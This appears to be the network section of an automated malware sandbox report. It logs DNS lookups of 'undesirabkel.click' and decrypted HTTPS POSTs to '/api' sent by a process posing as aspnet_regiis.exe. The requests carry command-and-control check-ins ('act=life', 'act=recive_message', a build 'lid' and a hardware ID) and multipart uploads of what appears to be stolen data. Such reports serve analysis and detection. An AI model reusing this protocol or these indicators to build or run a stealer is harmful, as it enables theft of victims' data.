Jan 4, 2025 09:42:14.265569925 CET	443	49745	188.114.96.3	192.168.2.4
Jan 4, 2025 09:42:14.265590906 CET	443	49745	188.114.96.3	192.168.2.4
Jan 4, 2025 09:42:14.265710115 CET	49745	443	192.168.2.4	188.114.96.3
Jan 4, 2025 09:42:14.265930891 CET	443	49745	188.114.96.3	192.168.2.4
Jan 4, 2025 09:42:14.266463041 CET	443	49745	188.114.96.3	192.168.2.4
Jan 4, 2025 09:42:14.266519070 CET	49745	443	192.168.2.4	188.114.96.3
Jan 4, 2025 09:42:14.266526937 CET	443	49745	188.114.96.3	192.168.2.4
Jan 4, 2025 09:42:14.270302057 CET	443	49745	188.114.96.3	192.168.2.4
Jan 4, 2025 09:42:14.270329952 CET	443	49745	188.114.96.3	192.168.2.4
Jan 4, 2025 09:42:14.270395994 CET	49745	443	192.168.2.4	188.114.96.3
Jan 4, 2025 09:42:14.270396948 CET	443	49745	188.114.96.3	192.168.2.4
Jan 4, 2025 09:42:14.270402908 CET	443	49745	188.114.96.3	192.168.2.4
Jan 4, 2025 09:42:14.270463943 CET	443	49745	188.114.96.3	192.168.2.4
Jan 4, 2025 09:42:14.270483971 CET	49745	443	192.168.2.4	188.114.96.3
Jan 4, 2025 09:42:14.270608902 CET	49745	443	192.168.2.4	188.114.96.3
Jan 4, 2025 09:42:14.270819902 CET	49745	443	192.168.2.4	188.114.96.3
Jan 4, 2025 09:42:14.270836115 CET	443	49745	188.114.96.3	192.168.2.4
Jan 4, 2025 09:42:14.270847082 CET	49745	443	192.168.2.4	188.114.96.3
Jan 4, 2025 09:42:14.270852089 CET	443	49745	188.114.96.3	192.168.2.4

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 4, 2025 09:41:59.845680952 CET	49481	53	192.168.2.4	1.1.1.1
Jan 4, 2025 09:41:59.859971046 CET	53	49481	1.1.1.1	192.168.2.4

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Jan 4, 2025 09:41:59.845680952 CET	192.168.2.4	1.1.1.1	0x8dac	Standard query (0)	undesirabkel.click	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Jan 4, 2025 09:41:59.859971046 CET	1.1.1.1	192.168.2.4	0x8dac	No error (0)	undesirabkel.click		188.114.96.3	A (IP address)	IN (0x0001)	false
Jan 4, 2025 09:41:59.859971046 CET	1.1.1.1	192.168.2.4	0x8dac	No error (0)	undesirabkel.click		188.114.97.3	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

undesirabkel.click

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	49736	188.114.96.3	443	7696	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-04 08:42:00 UTC	265	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 8 Host: undesirabkel.click
2025-01-04 08:42:00 UTC	8	OUT	Data Raw: 61 63 74 3d 6c 69 66 65 Data Ascii: act=life
2025-01-04 08:42:00 UTC	1129	IN	HTTP/1.1 200 OK Date: Sat, 04 Jan 2025 08:42:00 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=f7snmd5rb2fm859hho92uous23; expires=Wed, 30 Apr 2025 02:28:39 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=QJiaUEYX80BvGkCIKIsUU4E2WGf2PxZBpLWAjQL1upm9XZWd5nKKMwv1Qw9AITWXMpzNPcnb0QxWlvtrhYtnpJ2rO3CyIO%2B9r4Sxn7O%2B%2BQ978XyEwUOw%2FGfkJWcHIyMGZ8NIMYs%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fc9eec9a80242b8-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=2424&min_rtt=2414&rtt_var=926&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2845&recv_bytes=909&delivery_rate=1168935&cwnd=232&unsent_bytes=0&cid=d4cd9a0e646ab335&ts=621&x=0"
2025-01-04 08:42:00 UTC	7	IN	Data Raw: 32 0d 0a 6f 6b 0d 0a Data Ascii: 2ok
2025-01-04 08:42:00 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.4	49738	188.114.96.3	443	7696	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-04 08:42:01 UTC	266	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 54 Host: undesirabkel.click
2025-01-04 08:42:01 UTC	54	OUT	Data Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 4c 50 6e 68 71 6f 2d 2d 69 69 63 72 72 69 66 6f 66 68 66 67 26 6a 3d Data Ascii: act=recive_message&ver=4.0&lid=LPnhqo--iicrrifofhfg&j=
2025-01-04 08:42:02 UTC	1121	IN	HTTP/1.1 200 OK Date: Sat, 04 Jan 2025 08:42:02 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=v1hfetahhpgousqml528ca5nfd; expires=Wed, 30 Apr 2025 02:28:40 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=VWcCYk2lfoGhukATwOyTDfX3Y6DRcT2AC24dmv0Wn3XP9Ua6dZKrfovcxO9IJ5qgkwW5BiJDj1T7i1aUx1yeQH0LwjXpFZArfv5MVKhRG2d9pVujz53RiSx8ompwmYgjiYBDryQ%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fc9eecfba9f4367-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1585&min_rtt=1576&rtt_var=610&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2844&recv_bytes=956&delivery_rate=1764350&cwnd=237&unsent_bytes=0&cid=f37290843c0180f7&ts=881&x=0"
2025-01-04 08:42:02 UTC	248	IN	Data Raw: 63 35 30 0d 0a 73 65 42 45 4c 61 63 5a 41 51 71 53 62 6d 49 6b 55 53 56 35 4d 6c 76 6d 55 73 38 37 33 64 2f 67 52 51 65 48 2f 47 71 6c 62 59 33 4b 77 6a 49 50 6e 53 30 74 4b 4f 45 4c 51 42 34 6c 56 77 78 58 64 38 51 7a 71 78 6e 6e 75 59 45 70 64 4f 4c 51 53 4e 4d 41 72 34 75 47 4a 55 48 55 66 43 30 6f 39 78 5a 41 48 67 70 65 57 31 63 31 78 47 6a 74 58 72 65 39 67 53 6c 6c 35 70 63 46 31 51 48 75 32 59 77 6a 52 63 4a 36 5a 57 76 2b 41 77 64 42 4e 45 51 54 58 44 4b 4c 4f 71 49 5a 38 66 32 46 50 79 57 39 33 69 66 41 47 65 7a 38 67 54 64 47 68 57 51 74 63 62 41 4c 44 41 5a 72 42 78 68 58 4f 59 6f 30 71 31 43 31 74 34 67 68 5a 4f 4f 57 47 73 77 4c 35 64 6d 43 49 45 54 49 63 33 46 6d 39 41 51 4d 52 7a 35 45 57 78 35 35 67 79 6a 74 41 66 2f Data Ascii: c50seBELacZAQqSbmIkUSV5MlvmUs873d/gRQeH/GqlbY3KwjIPnS0tKOELQB4lVwxXd8QzqxnnuYEpdOLQSNMAr4uGJUHUfC0o9xZAHgpeW1c1xGjtXre9gSll5pcF1QHu2YwjRcJ6ZWv+AwdBNEQTXDKLOqIZ8f2FPyW93ifAGez8gTdGhWQtcbALDAZrBxhXOYo0q1C1t4ghZOOWGswL5dmCIETIc3Fm9AQMRz5EWx55gyjtAf/
2025-01-04 08:42:02 UTC	1369	IN	Data Raw: 75 73 43 52 30 39 49 73 46 31 77 6d 76 7a 4d 77 2f 44 38 4a 33 49 7a 43 77 42 41 78 49 4e 6b 51 55 56 7a 69 45 49 71 4a 5a 76 4c 57 4b 49 32 2f 71 6b 51 66 4a 42 65 6a 62 69 79 46 41 77 6e 4e 6c 5a 2f 4e 4d 54 67 59 30 58 31 73 49 65 61 51 67 72 6c 71 72 73 4a 4e 6e 65 71 75 48 53 4d 41 44 72 34 76 43 49 45 48 45 64 6d 4e 36 2b 41 63 4c 51 79 46 4d 45 6c 30 30 68 44 32 6e 56 72 79 39 68 53 31 76 36 70 51 4d 79 67 4c 70 30 34 4a 6d 41 59 56 38 65 79 69 6f 54 43 4e 44 49 30 41 58 52 6e 75 2b 63 4c 49 58 70 76 32 46 4b 79 57 39 33 67 44 43 44 4f 7a 59 6a 53 56 48 7a 6d 6c 6a 65 76 59 42 42 56 51 31 51 68 56 61 4f 70 59 36 6f 31 2b 38 74 49 6b 75 59 4f 4b 61 53 49 6c 50 36 4d 76 43 66 67 2f 6b 64 6d 68 6b 2b 68 73 41 42 69 77 4a 41 68 41 2b 69 48 44 31 47 62 Data Ascii: usCR09IsF1wmvzMw/D8J3IzCwBAxINkQUVziEIqJZvLWKI2/qkQfJBejbiyFAwnNlZ/NMTgY0X1sIeaQgrlqrsJNnequHSMADr4vCIEHEdmN6+AcLQyFMEl00hD2nVry9hS1v6pQMygLp04JmAYV8eyioTCNDI0AXRnu+cLIXpv2FKyW93gDCDOzYjSVHzmljevYBBVQ1QhVaOpY6o1+8tIkuYOKaSIlP6MvCfg/kdmhk+hsABiwJAhA+iHD1Gb
2025-01-04 08:42:02 UTC	1369	IN	Data Raw: 4b 36 57 5a 45 49 64 58 72 2f 6d 42 4d 6b 7a 50 4f 56 5a 72 2f 67 49 48 55 48 4e 59 56 55 6c 35 67 7a 7a 74 41 66 2b 77 67 79 39 6a 39 35 45 46 78 41 48 68 33 49 63 70 52 38 56 37 62 6d 33 30 42 77 74 46 50 6b 4d 4a 57 6a 6d 4d 4e 61 78 54 74 66 33 4d 5a 32 4c 39 33 6c 43 48 50 76 6a 59 77 42 4e 4d 79 33 56 6b 66 72 41 54 54 6c 39 7a 51 42 63 51 59 63 51 39 70 56 79 36 73 6f 4d 74 61 2b 43 55 42 4d 38 42 37 4d 47 4e 49 6b 2f 4a 63 32 6c 6c 2f 67 67 49 54 7a 68 4d 48 56 41 34 6a 6e 44 6a 47 62 69 6c 77 6e 38 6c 30 5a 6b 45 79 67 43 74 35 6f 45 6f 51 63 4a 74 49 33 65 2b 46 55 42 42 50 77 64 44 45 44 57 4e 4d 4b 5a 54 75 37 32 46 4b 6d 44 6d 6d 51 76 4b 43 4f 58 64 68 53 4a 44 7a 48 5a 6c 61 50 63 49 42 56 51 32 54 68 64 63 65 63 70 77 71 6b 48 2f 35 63 49 Data Ascii: K6WZEIdXr/mBMkzPOVZr/gIHUHNYVUl5gzztAf+wgy9j95EFxAHh3IcpR8V7bm30BwtFPkMJWjmMNaxTtf3MZ2L93lCHPvjYwBNMy3VkfrATTl9zQBcQYcQ9pVy6soMta+CUBM8B7MGNIk/Jc2ll/ggITzhMHVA4jnDjGbilwn8l0ZkEygCt5oEoQcJtI3e+FUBBPwdDEDWNMKZTu72FKmDmmQvKCOXdhSJDzHZlaPcIBVQ2ThdcecpwqkH/5cI
2025-01-04 08:42:02 UTC	173	IN	Data Raw: 6c 43 48 42 75 62 42 6a 43 68 47 79 48 31 72 62 2f 34 42 43 30 41 34 51 42 78 57 4e 49 77 39 71 46 71 2b 75 59 67 31 5a 75 36 55 42 63 31 50 6f 5a 4f 46 50 67 2b 64 4f 30 52 6b 32 52 77 62 56 43 55 48 42 42 34 67 78 44 65 68 47 65 66 39 67 53 68 73 36 70 59 41 79 41 44 72 33 59 51 67 51 73 42 30 61 58 72 34 41 67 31 4e 50 45 77 4a 55 44 53 41 50 4b 6c 52 74 4c 66 43 61 53 58 69 68 6b 69 66 54 39 72 65 6a 53 5a 4d 30 7a 74 38 4a 75 6c 4d 42 30 70 7a 48 31 74 63 4e 34 51 2f 6f 56 57 30 74 59 4d 72 61 2b 4b 62 0d 0a Data Ascii: lCHBubBjChGyH1rb/4BC0A4QBxWNIw9qFq+uYg1Zu6UBc1PoZOFPg+dO0Rk2RwbVCUHBB4gxDehGef9gShs6pYAyADr3YQgQsB0aXr4Ag1NPEwJUDSAPKlRtLfCaSXihkifT9rejSZM0zt8JulMB0pzH1tcN4Q/oVW0tYMra+Kb
2025-01-04 08:42:02 UTC	1369	IN	Data Raw: 33 64 34 34 0d 0a 41 63 38 48 2f 64 4b 47 4c 6b 37 4c 64 47 4a 73 39 51 6b 45 51 54 64 42 46 42 42 33 78 44 65 31 47 65 66 39 72 51 42 51 70 37 38 79 68 78 43 68 79 73 49 68 51 34 55 6a 49 32 54 7a 41 41 68 4a 4e 55 34 58 57 6a 43 50 50 4b 5a 64 73 37 53 48 49 57 54 67 6d 77 6e 44 41 2b 58 56 67 53 56 41 79 6e 52 72 4b 4c 35 4d 42 31 35 7a 48 31 74 31 4c 6f 38 2b 71 78 6d 67 38 35 74 6e 59 75 6e 65 55 49 63 44 35 74 57 45 49 30 50 45 66 57 74 74 2b 41 67 42 51 44 56 45 46 46 51 38 68 54 2b 70 56 62 47 33 67 79 5a 70 37 70 45 44 77 6b 2b 68 6b 34 55 2b 44 35 30 37 55 6d 76 6d 47 78 42 4b 63 31 68 56 53 58 6d 44 50 4f 30 42 2f 37 79 51 4c 57 2f 72 6d 77 66 43 44 4f 44 55 6a 79 42 44 7a 33 4a 72 62 76 38 46 45 6b 55 2f 53 52 78 65 4e 59 6f 39 70 31 71 79 2f Data Ascii: 3d44Ac8H/dKGLk7LdGJs9QkEQTdBFBB3xDe1Gef9rQBQp78yhxChysIhQ4UjI2TzAAhJNU4XWjCPPKZds7SHIWTgmwnDA+XVgSVAynRrKL5MB15zH1t1Lo8+qxmg85tnYuneUIcD5tWEI0PEfWtt+AgBQDVEFFQ8hT+pVbG3gyZp7pEDwk+hk4U+D507UmvmGxBKc1hVSXmDPO0B/7yQLW/rmwfCDODUjyBDz3Jrbv8FEkU/SRxeNYo9p1qy/
2025-01-04 08:42:02 UTC	1369	IN	Data Raw: 76 6d 51 2f 4d 42 2b 54 63 68 44 52 44 79 32 6c 6d 65 75 4a 4d 54 67 59 30 58 31 73 49 65 62 49 33 76 55 6d 38 2f 37 4d 78 5a 76 4f 56 42 63 74 50 38 4a 32 62 5a 6b 6a 4a 4f 7a 73 6f 39 67 4d 4a 52 54 78 47 45 6c 77 30 67 54 6d 6f 57 4c 6d 35 69 43 31 6c 34 35 67 4a 77 67 58 73 30 6f 67 76 53 4d 31 38 59 48 71 77 51 6b 42 42 4b 77 64 44 45 42 43 44 49 71 4e 4a 2f 36 4c 4d 50 69 58 69 6b 6b 69 66 54 2b 76 5a 6a 53 4a 49 79 58 31 6d 62 76 30 4e 44 30 63 7a 53 42 39 62 4d 49 49 78 6f 46 79 79 75 5a 41 74 62 75 71 53 41 63 73 43 72 35 33 43 49 56 65 46 49 79 4e 5a 2f 51 49 4f 51 53 55 48 42 42 34 67 78 44 65 68 47 65 66 39 67 79 74 71 35 70 45 4c 78 41 37 6c 77 5a 41 71 52 73 31 2b 62 32 50 2b 43 68 4a 41 50 45 34 59 55 7a 43 44 4f 4b 46 54 76 4c 72 43 61 53 Data Ascii: vmQ/MB+TchDRDy2lmeuJMTgY0X1sIebI3vUm8/7MxZvOVBctP8J2bZkjJOzso9gMJRTxGElw0gTmoWLm5iC1l45gJwgXs0ogvSM18YHqwQkBBKwdDEBCDIqNJ/6LMPiXikkifT+vZjSJIyX1mbv0ND0czSB9bMIIxoFyyuZAtbuqSAcsCr53CIVeFIyNZ/QIOQSUHBB4gxDehGef9gytq5pELxA7lwZAqRs1+b2P+ChJAPE4YUzCDOKFTvLrCaS
2025-01-04 08:42:02 UTC	1369	IN	Data Raw: 30 41 6a 77 6e 5a 74 6d 53 4d 6b 37 4f 79 6a 32 42 51 5a 42 4e 55 6b 4a 56 54 2b 4c 50 36 52 51 75 37 57 42 4a 32 48 68 6d 51 33 45 41 2b 54 55 67 53 6c 4c 7a 48 56 71 5a 37 42 43 51 45 45 72 42 30 4d 51 47 4a 38 7a 6f 56 54 2f 6f 73 77 2b 4a 65 4b 53 53 4a 39 50 34 39 32 48 4a 6b 58 44 66 32 5a 75 2b 67 6b 41 54 54 42 49 48 31 59 39 69 7a 43 6d 55 4c 36 37 68 79 31 75 34 35 4d 4c 77 51 6d 76 6e 63 49 68 56 34 55 6a 49 30 6a 72 41 51 78 42 63 31 68 56 53 58 6d 44 50 4f 30 42 2f 37 61 4f 49 32 4c 6c 6b 77 76 50 43 75 76 5a 68 79 5a 48 31 33 4e 6a 62 2b 49 65 41 45 38 32 53 78 68 51 50 59 49 35 71 31 71 37 2f 63 78 6e 59 76 33 65 55 49 63 69 34 39 53 72 49 56 53 46 5a 43 31 78 73 41 73 4d 42 6d 73 48 47 6c 73 7a 69 7a 32 75 58 37 79 32 68 79 31 6b 34 70 59 Data Ascii: 0AjwnZtmSMk7Oyj2BQZBNUkJVT+LP6RQu7WBJ2HhmQ3EA+TUgSlLzHVqZ7BCQEErB0MQGJ8zoVT/osw+JeKSSJ9P492HJkXDf2Zu+gkATTBIH1Y9izCmUL67hy1u45MLwQmvncIhV4UjI0jrAQxBc1hVSXmDPO0B/7aOI2LlkwvPCuvZhyZH13Njb+IeAE82SxhQPYI5q1q7/cxnYv3eUIci49SrIVSFZC1xsAsMBmsHGlsziz2uX7y2hy1k4pY
2025-01-04 08:42:02 UTC	1369	IN	Data Raw: 34 48 4d 5a 6c 32 46 49 79 4d 76 38 78 34 53 51 44 42 52 47 42 63 48 75 68 65 37 55 37 69 74 68 54 42 71 70 64 42 49 79 45 2b 33 36 73 49 76 53 4e 35 71 64 57 58 67 43 30 42 35 66 51 63 44 45 47 48 45 42 61 35 58 73 62 71 55 4e 69 6a 43 69 41 4c 41 48 2b 6a 45 6a 57 59 42 68 58 30 6a 4d 4b 4e 43 51 45 49 69 42 30 4d 41 61 39 39 6c 2f 67 37 76 37 35 31 70 66 4b 57 49 53 4a 39 64 6f 5a 4f 51 5a 68 65 46 50 47 42 36 34 67 6f 44 55 44 41 41 4a 57 34 65 6e 6a 32 72 54 71 36 44 76 43 42 2f 36 4a 67 66 31 6b 50 36 30 49 77 6f 53 4e 4d 37 4c 53 6a 2f 54 46 68 2f 63 77 39 62 62 33 66 45 4b 4f 30 42 2f 34 69 42 4b 57 76 69 69 42 6d 4b 4b 50 58 65 68 44 46 65 68 54 55 6a 62 72 42 55 55 67 68 7a 51 77 6f 51 59 64 52 69 39 67 7a 73 36 74 4a 31 65 71 75 48 53 4e 46 50 Data Ascii: 4HMZl2FIyMv8x4SQDBRGBcHuhe7U7ithTBqpdBIyE+36sIvSN5qdWXgC0B5fQcDEGHEBa5XsbqUNijCiALAH+jEjWYBhX0jMKNCQEIiB0MAa99l/g7v751pfKWISJ9doZOQZheFPGB64goDUDAAJW4enj2rTq6DvCB/6Jgf1kP60IwoSNM7LSj/TFh/cw9bb3fEKO0B/4iBKWviiBmKKPXehDFehTUjbrBUUghzQwoQYdRi9gzs6tJ1equHSNFP
2025-01-04 08:42:02 UTC	1369	IN	Data Raw: 5a 58 68 53 4d 6a 58 66 4d 43 44 6b 45 6c 56 6c 5a 34 47 72 34 4b 37 33 57 34 71 4d 41 54 59 76 57 50 41 38 6f 44 72 35 33 43 49 41 2b 64 4b 79 30 6f 39 42 31 41 48 6d 4d 56 51 41 56 71 30 32 44 2f 52 76 47 6b 77 6a 45 6c 76 63 78 47 68 78 32 76 69 38 4a 68 54 4e 64 70 5a 57 76 6d 44 30 64 34 44 57 41 56 56 7a 69 53 49 4c 70 57 67 59 4f 58 4a 47 76 72 6d 52 37 57 54 36 47 54 6a 57 59 58 2f 44 73 72 4b 4d 39 43 51 46 35 7a 48 31 74 6c 4f 6f 6f 2b 71 6b 2b 75 38 4b 55 70 59 75 53 49 47 4e 41 41 72 35 33 43 49 41 2b 64 4b 53 30 6f 39 42 31 41 48 6d 4d 56 51 41 56 71 30 32 44 2f 52 76 47 6b 77 6a 45 6c 76 63 78 47 68 78 32 76 69 38 4a 68 54 4e 64 70 5a 57 76 6d 44 30 64 34 44 57 41 56 56 7a 69 53 49 4c 70 57 38 4a 4f 30 42 6c 76 62 69 77 76 4a 41 65 6a 46 6b Data Ascii: ZXhSMjXfMCDkElVlZ4Gr4K73W4qMATYvWPA8oDr53CIA+dKy0o9B1AHmMVQAVq02D/RvGkwjElvcxGhx2vi8JhTNdpZWvmD0d4DWAVVziSILpWgYOXJGvrmR7WT6GTjWYX/DsrKM9CQF5zH1tlOoo+qk+u8KUpYuSIGNAAr53CIA+dKS0o9B1AHmMVQAVq02D/RvGkwjElvcxGhx2vi8JhTNdpZWvmD0d4DWAVVziSILpW8JO0BlvbiwvJAejFk

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.4	49740	188.114.96.3	443	7696	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-04 08:42:03 UTC	274	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=IN8UF5IP User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 18110 Host: undesirabkel.click
2025-01-04 08:42:03 UTC	15331	OUT	Data Raw: 2d 2d 49 4e 38 55 46 35 49 50 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 44 46 32 30 32 42 41 34 33 32 39 41 34 43 38 46 45 31 42 37 31 39 38 32 41 31 30 42 36 34 36 41 0d 0a 2d 2d 49 4e 38 55 46 35 49 50 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 49 4e 38 55 46 35 49 50 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4c 50 6e 68 71 6f 2d 2d 69 69 63 72 72 69 66 6f 66 68 66 67 0d 0a 2d 2d 49 4e 38 55 46 35 49 50 0d 0a 43 6f 6e 74 65 6e 74 2d 44 Data Ascii: --IN8UF5IPContent-Disposition: form-data; name="hwid"DF202BA4329A4C8FE1B71982A10B646A--IN8UF5IPContent-Disposition: form-data; name="pid"2--IN8UF5IPContent-Disposition: form-data; name="lid"LPnhqo--iicrrifofhfg--IN8UF5IPContent-D
2025-01-04 08:42:03 UTC	2779	OUT	Data Raw: a7 07 cf 5c b7 ad 66 f0 cc 99 a8 33 f7 13 05 cf ec 85 7a 3b 85 8d 54 32 2f 1f e5 1b c1 33 7b 37 a5 bf 9f 8e 3a f1 6e 9a e0 79 69 60 c1 4c a6 f2 f7 de 4b 1f 36 af 1d f9 d7 e0 58 6d 5b 0b fd 9c 0a b5 9b 60 cc b0 d7 ab 1f 3b d0 52 0a 9f fd 54 22 95 3f 7a 94 ff 75 ab 9f a1 e3 6f 93 83 99 38 43 4e 2f 95 2f 6d 6e ac ae d3 03 1e ad ac 6f 7a a3 8a 81 36 d9 bf 1f 83 71 fd 1a ed c5 4d d3 3e 9b d8 ac 97 0c bd 15 36 2b 97 37 bb ef 2e 57 0f bc 3e 57 2a 0f 97 2f ad 6d 4a a7 02 2f 2b 7f 42 10 78 3e ba 45 a8 b5 6d 75 bf 83 75 53 b3 09 3b 9c 3e 27 56 d3 d4 ab d6 33 5e 4f 4d 1f 4e cd b2 89 b4 bc b1 b1 56 29 af ef 1e fa 70 79 ed 62 65 cf 7b d9 de 73 45 81 36 af a9 da 16 51 bc 21 8f 77 45 11 8f 43 d4 61 11 d5 14 88 8d cc 54 77 94 6d 93 be 93 15 d7 52 9c ab a6 b6 5f c9 35 8b Data Ascii: \f3z;T2/3{7:nyi`LK6Xm[`;RT"?zuo8CN//mnoz6qM>6+7.W>W*/mJ/+Bx>EmuuS;>'V3^OMNV)pybe{sE6Q!wECaTwmR_5
2025-01-04 08:42:06 UTC	1132	IN	HTTP/1.1 200 OK Date: Sat, 04 Jan 2025 08:42:06 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Set-Cookie: PHPSESSID=ajohhj47v2i2542v81cdko1a9n; expires=Wed, 30 Apr 2025 02:28:42 GMT; Max-Age=9999999; path=/ Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate Pragma: no-cache X-Frame-Options: DENY X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block cf-cache-status: DYNAMIC vary: accept-encoding Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2FiNOadCTdoL3EFGiG78Dvk%2B9xzXfqiUBIUcj0YYEswpc3pLSXpwZoZjnUn34IALIfckrcXiMCFBj58wGnooDQJXNEuTGIm7GfI5K6ct8K6M%2BD214uXuNPnM5JDMG1opMD3zUmfk%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fc9eed9dfc143a3-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1584&min_rtt=1579&rtt_var=603&sent=10&recv=22&lost=0&retrans=0&sent_bytes=2846&recv_bytes=19064&delivery_rate=1796923&cwnd=226&unsent_bytes=0&cid=ca1ca5b8ecd9cca0&ts=3109&x=0"
2025-01-04 08:42:06 UTC	20	IN	Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a Data Ascii: fok 8.46.123.189
2025-01-04 08:42:06 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.4	49741	188.114.96.3	443	7696	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-04 08:42:06 UTC	278	OUT	POST /api HTTP/1.1 Connection: Keep-Alive Content-Type: multipart/form-data; boundary=6OYZR5SGAKWTW User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 8761 Host: undesirabkel.click
2025-01-04 08:42:06 UTC	8761	OUT	Data Raw: 2d 2d 36 4f 59 5a 52 35 53 47 41 4b 57 54 57 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 44 46 32 30 32 42 41 34 33 32 39 41 34 43 38 46 45 31 42 37 31 39 38 32 41 31 30 42 36 34 36 41 0d 0a 2d 2d 36 4f 59 5a 52 35 53 47 41 4b 57 54 57 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 36 4f 59 5a 52 35 53 47 41 4b 57 54 57 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4c 50 6e 68 71 6f 2d 2d 69 69 63 72 72 69 66 6f 66 68 66 67 0d 0a 2d 2d 36 4f 59 5a Data Ascii: --6OYZR5SGAKWTWContent-Disposition: form-data; name="hwid"DF202BA4329A4C8FE1B71982A10B646A--6OYZR5SGAKWTWContent-Disposition: form-data; name="pid"2--6OYZR5SGAKWTWContent-Disposition: form-data; name="lid"LPnhqo--iicrrifofhfg--6OYZ
